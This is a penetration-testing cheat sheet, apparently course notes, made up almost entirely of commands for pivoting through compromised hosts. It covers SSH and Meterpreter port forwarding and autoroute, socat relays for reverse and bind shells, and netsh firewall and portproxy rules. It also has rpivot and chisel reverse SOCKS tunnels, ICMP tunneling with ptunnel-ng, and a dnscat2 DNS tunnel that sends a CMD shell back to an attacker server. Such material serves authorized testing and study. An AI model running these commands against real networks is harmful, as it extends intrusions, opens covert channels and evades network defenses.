Pivoting, Tunneling & Port Forwarding
Enumeration
# Enumeration commands
ip a
ip route
ss -ntplu
# Starting tcpdump to listen on TCP/8080 through the tun0 interface
sudo tcpdump -nvvvXi tun0 tcp port 8080Port Forwarding
Local Port Forwarding
# Forward port 3306 from remote host to local port 1234 using ssh on port 22
# [LOCAL_IP:]LOCAL_PORT:DEST_IP:DEST_PORT
ssh -N -L 0.0.0.0:4455:172.16.5.217:445 ubuntu@10.10.10.10
# Metasploit Meterpreter
# start a listner local port 3300 and frwd trafic to the remote host on port 3389
meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.129
Dynamic Port Forwarding
# Enable Dynamic Port Forwarding on port 1234 over SSH
ssh -N -D 0.0.0.0:1234 ubuntu@10.10.10.10
# Change proxychains configuration file to use our local port 1234
echo "socks5 127.0.0.1 1234" | tee -a /etc/proxychains.conf
# Metasploit Meterpreter
# Configuring a local proxy with msf socks_proxy this will open a local port 9050
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 5
msf6 auxiliary(server/socks_proxy) > run
# Change proxychains configuration file to use our local port 9050
echo "socks5 127.0.0.1 9050" | tee -a /etc/proxychains.conf
# Configure socks_proxy to route all the traffic via Meterpreter session
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
msf6 post(multi/manage/autoroute) > run
# or you can configure directly it from meterpreter session
meterpreter > run autoroute -s 172.16.5.0/23
# Listing Active Routes with AutoRoute
meterpreter > run autoroute -p
Reverse Port Forwarding
# listen on port 8080 of InternalIPofPivotHost and forward connexion to port 8000 on attack host
# ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.15.50 -vN
# Metasploit Meterpreter
# send all trafic received from remote host on port 1234 to local port 8081
meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.15.5
SSH Remote Dynamic Port Forwarding
# SSH Remote Port Forwarding
# Starting the SSH server
sudo systemctl start ssh
# Connect to kali and open a local port 2345 to forward tafic to 10.4.50.215:5432
ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.0.4
# SSH Remote Dynamic Port Forwarding
# Connect to kali and open a local port 2345 to forward trafic via the pivot host
ssh -N -R 2345 kali@192.168.0.4
# Change proxychains configuration file to use our local port 2345
echo "socks5 127.0.0.1 2345" | tee -a /etc/proxychains.conf
Socat Redirection
# Socat Redirection with a Reverse Shell
# Listen on localhost port 8080 and frwd all trafic to 10.10.14.18 port 80
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
socat -ddd TCP-LISTEN:8080,fork TCP:10.10.14.18:80
# Socat Redirection with a Bind Shell
# listens on port 8080 and forwards trafic to 172.16.5.19 port 8443
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443SSH Pivoting with sshuttle
# use sshuttle to route trafic via remote host over SSH / VPN with SSH
sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v
sshuttle -r ubuntu@10.129.202.64 0/0 -vSSH for Windows
# Locate ssh.exe if present you can use it to Pivot/Port forward
where ssh
%systemdrive%\Windows\System32\OpenSSH
# Plink
# Plink Remote Port Forwarding
# Connect to kali and open a local port 9833 and forward tafic to 127.0.0.1:3389
cmd.exe /c echo y | .\plink.exe -ssh -l kali -pw <mykalipassword> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.0.4
# Enable Dynamic Port Forwarding on local port 9050 over SSH
plink.exe -ssh -D 9050 ubuntu@10.129.15.50
# After that we need to use Proxifier to send trafic via port 9050Port Forwarding with Windows netsh
# create a rule to allow connection from port 2222 in the Windows firewall
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=10.129.42.198 localport=2222 action=allow
# Using netsh.exe to Port Forward
# listen on port 2222 and forward received connection to connectaddress port 22
netsh.exe interface portproxy add v4tov4 listenport=2222 listenaddress=10.129.42.198 connectport=22 connectaddress=172.16.5.25
# Verifying Port Forward
netsh.exe interface portproxy show v4tov4
netstat -anp TCP | find "2222"Web Server Pivoting with Rpivot
# Running server.py from the Attack Host
# Allow the client to connect on port 9999 and listen on port 9050
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
# Running client.py from Pivot Target
# Connect to attack host on port 9999
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
# Change proxychains configuration file to use our local port 9050
echo "socks5 127.0.0.1 9050" | tee -a /etc/proxychains.confTunneling
DNS Tunneling with Dnscat2
# Starting the dnscat2 server
sudo ruby dnscat2.rb --dns host=10.1.1.1,port=53,domain=domain.local --no-cache
# Importing dnscat2.ps1 and establishing a DNS tunnel with the server to send back a CMD shell
Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver 10.1.1.1 -Domain domain.local -PreSharedSecret 0ec04..snip..89d21 -Exec cmd
dnscat2> ?
dnscat2> window -i 1SOCKS5 Tunneling with Chisel
# Running the Chisel Server on the Pivot Host
./chisel server -v -p 1234 --socks5
# Connecting to the Chisel Server from attack host
./chisel client -v 10.129.202.64:1234 socks
echo "socks5 127.0.0.1 1080" | tee -a /etc/proxychains.conf
# Chisel Reverse Pivot
# Starting the Chisel Server on Attack Host
sudo ./chisel server --reverse -v -p 1234 --socks5
echo "socks5 127.0.0.1 1080" | tee -a /etc/proxychains.conf
# Connecting the Chisel Client from Pivot Host
./chisel client -v 10.10.14.17:1234 R:socks
# ssh over socks5 proxy like : proxychains ssh admin@10.4.5.5
ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' admin@10.4.5.5ICMP Tunneling with SOCKS
# Starting the ptunnel-ng Server on the Target Host.
sudo ./ptunnel-ng -r10.129.202.64 -R22 # 10.129.202.64 is the IP of the target host
# Connecting to ptunnel-ng Server from Attack Host
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22
# Tunneling an SSH connection through an ICMP Tunnel
ssh -p2222 -lubuntu 127.0.0.1
# Enabling Dynamic Port Forwarding over SSH
ssh -D 9050 -p2222 -lubuntu 127.0.0.1RDP and SOCKS Tunneling with SocksOverRDP
# Loading SocksOverRDP.dll using regsvr32.exe on attack host
regsvr32.exe SocksOverRDP-Plugin.dll
# Now we can connect to pivot host over RDP using mstsc.exe
# start SocksOverRDP-Server.exe with Admin privileges on pivot host.
# on attack host we can confirm the SOCKS Listener is Started, so we can formward all trafic to 127.0.0.1:1080 with Proxifier
netstat -antb | findstr 1080Last updated